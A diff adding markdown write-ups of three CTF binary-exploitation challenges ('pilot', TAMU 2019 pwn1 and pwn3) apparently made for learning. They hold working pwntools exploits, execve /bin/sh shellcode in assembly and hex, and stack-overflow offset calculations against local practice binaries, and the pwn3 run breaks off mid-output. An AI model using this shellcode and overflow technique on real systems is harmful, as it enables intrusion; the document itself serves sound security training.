+_" We know that the target is a 64-bit Linux (ELF) binary (as per the ‘file’ output), so why not provide shellcode that executes /bin/sh and drop us into a shell on the host running ‘pilot’? NYU’s Offensive Security, Incident Response and Internet Security Laboratory (OSIRIS Lab) was kind enough to open source an entire repository of shellcode written by NYU students. Browsing through this repository, we come across a directory containing shellcode designed to achieve our goal - 64-bit local /bin/sh. [...] This will be our shellcode that executes /bin/sh to drop us into a shell on the target system."_
+
+So we could clone the repository locally and generate the shellcode ourselves aswell, but we can also pick a 64bit /bin/sh shellcode from [shell-storm.org](http://shell-storm.org/shellcode/) and just copy paste it. Or we could also contruct our own shellcode instead, this is better because that way we know what the source assembly code is, and we compile the shellcode ourselves::
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/55 ] [binexp/2/pilot]
+ → vim 7.asm
+
+
+
+
+ section .text
+ global _start
+
+ _start:
+
+ xor esi, esi ; xor out esi and edx
+ xor edx, edx
+
+ push 0x3b ;push the value of the syscall id onto the stack (0x3b is 59)
+ pop rax ;take the out the top of the stack to put it into rax
+
+ mov rbx, 0x68732f2f6e69622f ; put the little endian hex val of '/bin//sh' into rbx
+
+ push rsi
+ push rbx
+ mov rdi, rsp
+ syscall
+
+
+
+Now let's compile it and test it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → nasm -f elf64 7.asm
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → ld 7.o -o 7
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → ./7
+
+ [ 192.168.100.1/24 ] [ /dev/pts/7 ] [/home/nothing/binexp/2/pilot]
+ → echo $0
+ bash
+
+ [ 192.168.100.1/24 ] [ /dev/pts/7 ] [/home/nothing/binexp/2/pilot]
+ → exit
+ exit
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → echo $0
+ /bin/zsh
+
+
+
+And we see that it enables us to switch from zsh to bash! now let's make shellcode out of it after we adjust the assembly file:
+
+
+ [bits 64]
+
+ xor esi, esi ; xor out esi and edx
+ xor edx, edx
+
+ push 0x3b ;push the value of the syscall id onto the stack (0x3b is 59)
+ pop rax ;take the out the top of the stack to put it into rax
+
+ mov rbx, 0x68732f2f6e69622f ; put the little endian hex val of '/bin//sh' into rbx
+
+ push rsi ; push the value of rsi
+ push rbx ; push the value of rbx
+ mov rdi, rsp ; move the value of rsp ( ) into rdi (first arguement)
+ syscall
+
+
+
+Now let's compile it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → nasm -f bin 7.asm -o shellcode
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → cat shellcode
+ 11j;XH/bin//shVSH%
+
+
+
+Now let's view it inside of python exploit script:
+
+
+ from pwn import *
+
+
+ #read the shellcode file we compiled
+ with open('shellcode', 'rb') as f:
+ shellcode = f.read()
+
+ #initialize the payload
+ payload = b""
+
+ payload += shellcode
+
+ print(payload)
+ print(hexdump(payload))
+
+
+
+
+Now let's test our script:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → python3 exploit.py
+ b'1\xf61\xd2j;XH\xbb/bin//shVSH\x89\xe7\x0f\x05'
+ 00000000 31 f6 31 d2 6a 3b 58 48 bb 2f 62 69 6e 2f 2f 73 │1·1·│j;XH│·/bi│n//s│
+ 00000010 68 56 53 48 89 e7 0f 05 │hVSH│····│
+ 00000018
+
+
+
+Now let's make the full payload and view the hexdump of it:
+
+
+ from pwn import *
+
+
+ target = process('./pilot')
+
+
+ #print the output text until the 'Location:' part
+ print(target.recvuntil("[*]Location:"))
+
+ #right after the 'Location:' part, is the memory address of our input
+ leak = target.recvline()
+ inputAdr = int(leak.strip(b"\n"), 16)
+
+ #store the memory address until the newline character (16 characters)
+ print(inputAdr)
+
+
+
+ with open('shellcode', 'rb') as f:
+ shellcode = f.read()
+
+ #initialize the payload
+ payload = b""
+
+ #add the shellcode to the payload this is 21 bytes long or 0x15 in hexa
+ payload += shellcode
+
+ #add the remaining required padding to the payload so that it attains the 0x28 size (thanks to added nullbytes)
+ payload += b"\x00" * (0x28 - len(payload))
+
+ #overwrite the return address with the address of the start of our input
+ payload += p64(inputAdr)
+
+ print(payload)
+ print(hexdump(payload))
+
+
+
+The plan here is to first push shellcode onto the stack, and we know where it is thanks to the memory address that's given to us, then we fill the gap with nullbytes, and then overwrite the return address to point to the start of our shellcode
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → python3 exploit.py
+ [+] Starting local process './pilot': pid 2235412
+ b'[*]Welcome DropShip Pilot...\n[*]I am your assitant A.I....\n[*]I will be guiding you through the tutorial....\n[*]As a first step, lets learn how to land at the designated location....\n[*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...\n[*]Good Luck Pilot!....\n[*]Location:'
+ 140732702676240
+ b'1\xf61\xd2j;XH\xbb/bin//shVSH\x89\xe7\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10U\xc0\xe2\xfe\x7f\x00\x00'
+ 00000000 31 f6 31 d2 6a 3b 58 48 bb 2f 62 69 6e 2f 2f 73 │1·1·│j;XH│·/bi│n//s│
+ 00000010 68 56 53 48 89 e7 0f 05 00 00 00 00 00 00 00 00 │hVSH│····│····│····│
+ 00000020 00 00 00 00 00 00 00 00 10 55 c0 e2 fe 7f 00 00 │····│····│·U··│····│
+ 00000030
+
+
+
+Now that we have our payload, we send the payload to the binary file with the following last 2 lines :
+
+
+
+ target.send(payload)
+ target.interactive()
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → python3 exploit.py
+ [+] Starting local process './pilot': pid 2248247
+ b'[*]Welcome DropShip Pilot...\n[*]I am your assitant A.I....\n[*]I will be guiding you through the tutorial....\n[*]As a first step, lets learn how to land at the designated location....\n[*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...\n[*]Good Luck Pilot!....\n[*]Location:'
+ 140730313557488
+ b'1\xf61\xd2j;XH\xbb/bin//shVSH\x89\xe7\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0EYT\xfe\x7f\x00\x00'
+ 00000000 31 f6 31 d2 6a 3b 58 48 bb 2f 62 69 6e 2f 2f 73 │1·1·│j;XH│·/bi│n//s│
+ 00000010 68 56 53 48 89 e7 0f 05 00 00 00 00 00 00 00 00 │hVSH│····│····│····│
+ 00000020 00 00 00 00 00 00 00 00 f0 45 59 54 fe 7f 00 00 │····│····│·EYT│····│
+ 00000030
+ [*] Switching to interactive mode
+ [*]Command:$ cat flag.txt
+ flag{g0ttem_b0yz}
+ $ exit
+ [*] Got EOF while reading in interactive
+ $ exit
+ [*] Process './pilot' stopped with exit code 0 (pid 2248247)
+ [*] Got EOF while sending in interactive
+
+
+
+And that's it! we have been able to spawn a shell and print out the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/pwn1.md b/2/pwn1.md
new file mode 100644
index 0000000..3a53238
--- /dev/null
+++ b/2/pwn1.md
@@ -0,0 +1,320 @@
+# TAMU 2019 pwn1
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/tamu19_pwn1/pwn1
+ --2021-02-23 13:16:19-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/tamu19_pwn1/pwn1
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/tamu19_pwn1/pwn1 [following]
+ --2021-02-23 13:16:20-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/tamu19_pwn1/pwn1
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7536 (7.4K) [application/octet-stream]
+ Saving to: ‘pwn1’
+
+ pwn1 100%[=======================================================================================================================================================================================================>] 7.36K --.-KB/s in 0.003s
+
+ 2021-02-23 13:16:20 (2.58 MB/s) - ‘pwn1’ saved [7536/7536]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → file pwn1
+ pwn1: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d126d8e3812dd7aa1accb16feac888c99841f504, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → chmod +x pwn1
+
+
+` ![]()
+
+## Solution
+
+First step, let's run the binary to see what it does:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → ./pwn1
+ Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
+ What... is your name?
+ nothing
+ I don't know that! Auuuuuuuugh!
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → ./pwn1
+ Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
+ What... is your name?
+ nobody
+ I don't know that! Auuuuuuuugh!
+
+
+similar to the previous 2 challenges, it prompts us for some text, and we need to put in something specific, so let's inspect the binary from ghidra:
+
+
+
+
+ /* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
+
+ undefined4 main(void)
+
+ {
+ int iVar1;
+ char local_43 [43];
+ int local_18;
+ undefined4 local_14;
+ undefined *local_10;
+
+ local_10 = &stack0x00000004;
+ setvbuf(stdout,(char *)0x2,0,0);
+ local_14 = 2;
+ local_18 = 0;
+ puts(
+ "Stop! Who would cross the Bridge of Death must answer me these questions three, ere theother side he see."
+ );
+ puts("What... is your name?");
+ fgets(local_43,0x2b,stdin);
+ iVar1 = strcmp(local_43,"Sir Lancelot of Camelot\n");
+ if (iVar1 != 0) {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ puts("What... is your quest?");
+ fgets(local_43,0x2b,stdin);
+ iVar1 = strcmp(local_43,"To seek the Holy Grail.\n");
+ if (iVar1 != 0) {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ puts("What... is my secret?");
+ gets(local_43);
+ if (local_18 == -0x215eef38) {
+ print_flag();
+ }
+ else {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ }
+ return 0;
+ }
+
+
+looking at the disassembly code, we see a few interesting things. First of all our input text is stored in the variable 'local_43' and then it gets compared to the string of text 'Sir Lancelot of Camelot', depending on that it will either exit with the text 'i don't know that!' or proceed. so let's continue:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → ./pwn1
+ Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
+ What... is your name?
+ Sir Lancelot of Camelot
+ What... is your quest?
+ To seek the Holy Grail.
+ What... is my secret?
+ something secret
+ I don't know that! Auuuuuuuugh!
+
+
+Likewise, we also see that we need to input the seek the holy grail quest text, but then we do not know the secret passphrase yet. So we need to investigate further:
+
+
+ puts("What... is my secret?");
+ gets(local_43);
+ if (local_18 == -0x215eef38) {
+ print_flag();
+ }
+ else {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ }
+ return 0;
+
+
+in here, our input text gets put into local_43, and then it is basically not even using our text, instead the binary file checks if local_18 is the same as -0x215eef38, so let's see what this is about:
+
+
+ int local_18;
+
+ [...]
+
+ local_18 = 0;
+
+ [...]
+
+ if (local_18 == -0x215eef38) {
+ print_flag();
+ }
+ else {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ }
+
+
+apparently local_18 is supposed to be an integer being set to 0, let's get more info on this integer:
+
+
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main(undefined1 param_1)
+ undefined AL:1
+ undefined1 Stack[0x4]:1 param_1 XREF[1]: 00010779(*)
+ undefined4 Stack[0x0]:4 local_res0 XREF[1]: 00010780(R)
+ undefined1 Stack[-0x10]:1 local_10 XREF[1]: 000108d9(*)
+ undefined4 Stack[-0x14]:4 local_14 XREF[1]: 000107ad(W)
+ undefined4 Stack[-0x18]:4 local_18 XREF[2]: 000107b4(W),
+ 000108b2(R)
+ undefined1 Stack[-0x43]:1 local_43 XREF[5]: 000107ed(*),
+ 00010803(*),
+ 0001084f(*),
+ 00010865(*),
+ 000108a6(*)
+ main XREF[5]: Entry Point(*),
+ _start:000105e6(*), 00010ab8,
+ 00010b4c(*), 00011ff8(*)
+ 00010779 8d 4c 24 04 LEA ECX=>param_1,[ESP + 0x4]
+
+
+
+and let's get the information as to what our integer should be:
+
+
+
+
+ 000108b2 81 7d f0 CMP dword ptr [EBP + local_18],0xdea110c8
+ c8 10 a1 de
+
+
+
+right here we see that the if statement compares our local_18 variable to the 0xdea110c8 value, if it is equal, it will call the print_flag function, so let's check out what we have about that function:
+
+
+
+
+ /* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
+
+ void print_flag(void)
+
+ {
+ FILE *__fp;
+ int iVar1;
+
+ puts("Right. Off you go.");
+ __fp = fopen("flag.txt","r");
+ while( true ) {
+ iVar1 = _IO_getc((_IO_FILE *)__fp);
+ if ((char)iVar1 == -1) break;
+ putchar((int)(char)iVar1);
+ }
+ putchar(10);
+ return;
+ }
+
+
+what we need to do here basically is that we have to use the gets call to overwrite the contents of local_18 to become 0xdea110c8 in order to get the flag.txt. Now looking at the following assembly code:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main(undefined1 param_1)
+ undefined AL:1
+ undefined1 Stack[0x4]:1 param_1 XREF[1]: 00010779(*)
+ undefined4 Stack[0x0]:4 local_res0 XREF[1]: 00010780(R)
+ undefined1 Stack[-0x10]:1 local_10 XREF[1]: 000108d9(*)
+ undefined4 Stack[-0x14]:4 local_14 XREF[1]: 000107ad(W)
+ undefined4 Stack[-0x18]:4 local_18 XREF[2]: 000107b4(W),
+ 000108b2(R)
+ undefined1 Stack[-0x43]:1 local_43 XREF[5]: 000107ed(*),
+ 00010803(*),
+ 0001084f(*),
+ 00010865(*),
+ 000108a6(*)
+ main XREF[5]: Entry Point(*),
+ _start:000105e6(*), 00010ab8,
+ 00010b4c(*), 00011ff8(*)
+ 00010779 8d 4c 24 04 LEA ECX=>param_1,[ESP + 0x4]
+
+
+
+we see that our input (local_43) starts at offset -0x43. we also see that local_18 starts at offset -0x18. so we need to take into account the following offset: **0x43 - 0x18 = 0x2b** between the start of our input and local_18. Then we will be able to overflow it and overwrite local_18 with 0xdea110c8 so let's write the python exploit:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → ls -lash
+ total 20K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Feb 23 13:35 .
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Feb 23 13:16 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 18 Feb 23 13:35 flag.txt
+ 8.0K -rwxr-xr-x 1 nothing nothing 7.4K Feb 23 13:16 pwn1
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./pwn1')
+
+ payload = b""
+ payload += b"0"*0x2b
+ payload += p32(0xdea110c8)
+
+ target.sendline("Sir Lancelot of Camelot")
+ target.sendline("To seek the Holy Grail.")
+
+ target.sendline(payload)
+ target.interactive()
+
+
+
+So first we create the payload ( 2b zeroes for the initial padding and then with the little endian value 0xdea110c8). After the payload is created, we send the 2 strings of text the binary wants to get past the first 2 questions, and then we send the payload. After that we get into an interactive shell to see what the result is:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → vim exploit.py
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → python3 exploit.py
+ [+] Starting local process './pwn1': pid 34429
+ [*] Switching to interactive mode
+ [*] Process './pwn1' stopped with exit code 0 (pid 34429)
+ Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
+ What... is your name?
+ What... is your quest?
+ What... is my secret?
+ Right. Off you go.
+ flag{g0ttem_b0yz}
+
+ [*] Got EOF while reading in interactive
+ $ :-)
+
+
+
+And that's it! We have been able to print out the flag thanks to our buffer overflow payload.
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/pwn3.md b/2/pwn3.md
new file mode 100644
index 0000000..04f0f9b
--- /dev/null
+++ b/2/pwn3.md
@@ -0,0 +1,340 @@
+# TAMU 2019 Pwn3
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/tamu19_pwn3/pwn3
+ --2021-03-05 12:37:20-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/tamu19_pwn3/pwn3
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/tamu19_pwn3/pwn3 [following]
+ --2021-03-05 12:37:20-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/tamu19_pwn3/pwn3
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7348 (7.2K) [application/octet-stream]
+ Saving to: ‘pwn3’
+
+ pwn3 100%[============================================================================================================================================================================>] 7.18K --.-KB/s in 0.001s
+
+ 2021-03-05 12:37:21 (12.1 MB/s) - ‘pwn3’ saved [7348/7348]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → file pwn3
+ pwn3: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6ea573b4a0896b428db719747b139e6458d440a0, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → chmod +x pwn3
+
+
+
+
+` ![]()
+
+## Solution
+
+First let's execute the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → ./pwn3
+ Take this, you might need it on your journey 0xfff0aa1e!
+ thanks!
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → ./pwn3
+ Take this, you might need it on your journey 0xffa9ce0e!
+ No Thanks!
+
+
+
+Here we see the binary giving us some text output with a certain memory address, and then prompts us for our text and depending on that text, we might get an answer or not. Now let's view it inside of ghidra:
+
+
+
+We get the following code:
+
+
+ undefined4 main(void)
+
+ {
+ undefined *puVar1;
+
+ puVar1 = &stack0x00000004;
+ setvbuf(stdout,(char *)0x2,0,0);
+ echo(puVar1);
+ return 0;
+ }
+
+
+Here we see that the important part of the main function is the echo function:
+
+
+ /* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
+
+ void echo(void)
+
+ {
+ char local_12e [294];
+
+ printf("Take this, you might need it on your journey %p!\n",local_12e);
+ gets(local_12e);
+ return;
+ }
+
+
+
+Here we see our input text gets passed into local_12e, and the function prints the address of the char buffer of local_12e. The bug here is that the gets function that is being used to process our input does not have a limit, it won't restrict us no matter how much data we feed through it, so we have an overflow right here. The question is what do we call ? There are not any function that print the flag nor give a shell, This is why we need to feed shellcode in.
+
+Now in the previous challenge we were able to create the shellcode we needed for the x86_64 architecture. However this time we need to take into account that this is a 32 bit binary, we have to follow the x86 architecture as we create our shellcode. For this example we're going to grab some shellcode from [shell-storm.org](http://shell-storm.org/shellcode/files/shellcode-827.php).
+
+Now let's use gdb to see how much space we have between the start of our input and the return address:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/pwn3]
+ → gdb ./pwn3
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./pwn3...
+ (No debugging symbols found in ./pwn3)
+ gef➤ disas echo
+ Dump of assembler code for function echo:
+ 0x0000059d <+0>: push ebp
+ 0x0000059e <+1>: mov ebp,esp
+ 0x000005a0 <+3>: push ebx
+ 0x000005a1 <+4>: sub esp,0x134
+ 0x000005a7 <+10>: call 0x4a0 <__x86.get_pc_thunk.bx>
+ 0x000005ac <+15>: add ebx,0x1a20
+ 0x000005b2 <+21>: sub esp,0x8
+ 0x000005b5 <+24>: lea eax,[ebp-0x12a]
+ 0x000005bb <+30>: push eax
+ 0x000005bc <+31>: lea eax,[ebx-0x191c]
+ 0x000005c2 <+37>: push eax
+ 0x000005c3 <+38>: call 0x410
+ 0x000005c8 <+43>: add esp,0x10
+ 0x000005cb <+46>: sub esp,0xc
+ 0x000005ce <+49>: lea eax,[ebp-0x12a]
+ 0x000005d4 <+55>: push eax
+ 0x000005d5 <+56>: call 0x420
+ 0x000005da <+61>: add esp,0x10
+ 0x000005dd <+64>: nop
+ 0x000005de <+65>: mov ebx,DWORD PTR [ebp-0x4]
+ 0x000005e1 <+68>: leave
+ 0x000005e2 <+69>: ret
+ End of assembler dump.
+
+
+
+Now as we disassembled the echo function, we set a breakpoint +61 because this is right after the gets call where we insert our text in.
+
+
+ gef➤ b *echo+61
+ Breakpoint 1 at 0x5da
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/pwn3/pwn3
+ Take this, you might need it on your journey 0xffffcfbe!
+ 13371337
+
+ Breakpoint 1, 0x565555da in echo ()
+ ~/.gef-54e93efd89ec59e5d178fbbeda1fed890098d18d.py:2425: DeprecationWarning: invalid escape sequence '\
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0xffffcfbe → "13371337"
+ $ebx : 0x56556fcc → 0x00001ed4
+ $ecx : 0xf7f90540 → 0xfbad2288
+ $edx : 0xfbad2288
+ $esp : 0xffffcfa0 → 0xffffcfbe → "13371337"
+ $ebp : 0xffffd0e8 → 0xffffd0f8 → 0x00000000
+ $esi : 0x1
+ $edi : 0x56555460 → <_start+0> xor ebp, ebp
+ $eip : 0x565555da → add esp, 0x10
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffcfa0│+0x0000: 0xffffcfbe → "13371337" ← $esp
+ 0xffffcfa4│+0x0004: 0xffffcfbe → "13371337"
+ 0xffffcfa8│+0x0008: 0xffffcfff → 0xffd08000
+ 0xffffcfac│+0x000c: 0x565555ac → add ebx, 0x1a20
+ 0xffffcfb0│+0x0010: 0x00000000
+ 0xffffcfb4│+0x0014: 0x00000000
+ 0xffffcfb8│+0x0018: 0x00000000
+ 0xffffcfbc│+0x001c: 0x3331b6ff
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x565555ce lea eax, [ebp-0x12a]
+ 0x565555d4 push eax
+ 0x565555d5 call 0x56555420
+ → 0x565555da add esp, 0x10
+ 0x565555dd nop
+ 0x565555de mov ebx, DWORD PTR [ebp-0x4]
+ 0x565555e1 leave
+ 0x565555e2 ret
+ 0x565555e3 lea ecx, [esp+0x4]
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "pwn3", stopped 0x565555da in echo (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x565555da → echo()
+ [#1] 0x5655561a → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤ search-pattern 13371337
+
+
+
+Now that we set the breakpoint, we run the binary, and put in an easy-to remember pattern (13371337) and then we search for that pattern in the memory:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[heap]'(0x56558000-0x5657a000), permission=rw-
+ 0x565581a0 - 0x565581aa → "13371337\n"
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rwx
+ 0xffffcfbe - 0xffffcfc6 → "13371337"
+
+ gef➤ info frame
+ Stack level 0, frame at 0xffffd0f0:
+ eip = 0x565555da in echo; saved eip = 0x5655561a
+ called by frame at 0xffffd110
+ Arglist at 0xffffd0e8, args:
+ Locals at 0xffffd0e8, Previous frame's sp is 0xffffd0f0
+ Saved registers:
+ ebx at 0xffffd0e4, ebp at 0xffffd0e8, eip at 0xffffd0ec
+
+
+
+Here we see that the important addresses are **0xffffd0ec** and **0xffffcfbe**. So let's calculate the offset:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(0xffffd0ec)
+ '0xffffd0ec'
+ >>> hex(0xffffd0ec - 0xffffcfbe)
+ '0x12e'
+
+
+
+And we see that we have an offset of 0x12e bytes between the start of our input (0xffffcfbe) and the return address (0xffffd0ec). This makes sense because our input value (local_12e) is 294 bytes large,there are 2 saved register values (ebx and ebp) on the stack in between our input and the saved return address which are each 4 bytes a piece (294 + 4 +4 = 0x12e). So with this we can construct our payload :
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/12 ] [binexp/2/pwn3]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./pwn3')
+
+ #print the text, up to the address of the start of the input
+ print(target.recvuntil("journey "))
+
+ #Scan the rest of the line
+ leak = target.recvline()
+
+ Adr = int(leak.strip(b"!\n"),16)
+
+ shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+ payload = b""
+ payload += shellcode
+ payload += b"\x00" * (0x12e - len(payload))
+ payload += p32(Adr)
+
+ print(hexdump(payload))
+
+
+
+The plan here is to first push shellcode onto the stack, and we know where it is thanks to the memory address that's given to us, then we fill the gap with nullbytes, and then overwrite the return address to point to the start of our shellcode
+
+Now let's check out our payload:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/13 ] [binexp/2/pwn3]
+ → python3 exploit.py
+ [+] Starting local process './pwn3': pid 218489
+ b'Take this, you might need it on your journey '
+ 00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 │1·Ph│//sh│h/bi│n··P│
+ 00000010 53 89 e1 b0 0b cd 80 00 00 00 00 00 00 00 00 00 │S···│····│····│····│
+ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe d4 │····│····│····│····│
+ 00000130 94 ff │··│
+ 00000132
+
+
+
+Now let's use the following 2 lines to feed our payload into the binary:
+
+
+ target.sendline(payload)
+ target.interactive()
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/13 ] [binexp/2/pwn3]
+ → python3 exploit.py
+ [+] Starting local process './pwn3': pid 524665
+ b'Take this, you might need it on your journey '
+ 00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 dc 50 │1·Ph│//sh│h/bi│n··P│
+ 00000010 53 89 cc b0 0b cd 80 00 00 00 00 00 00 00 00 00 │S···│····│····│····│
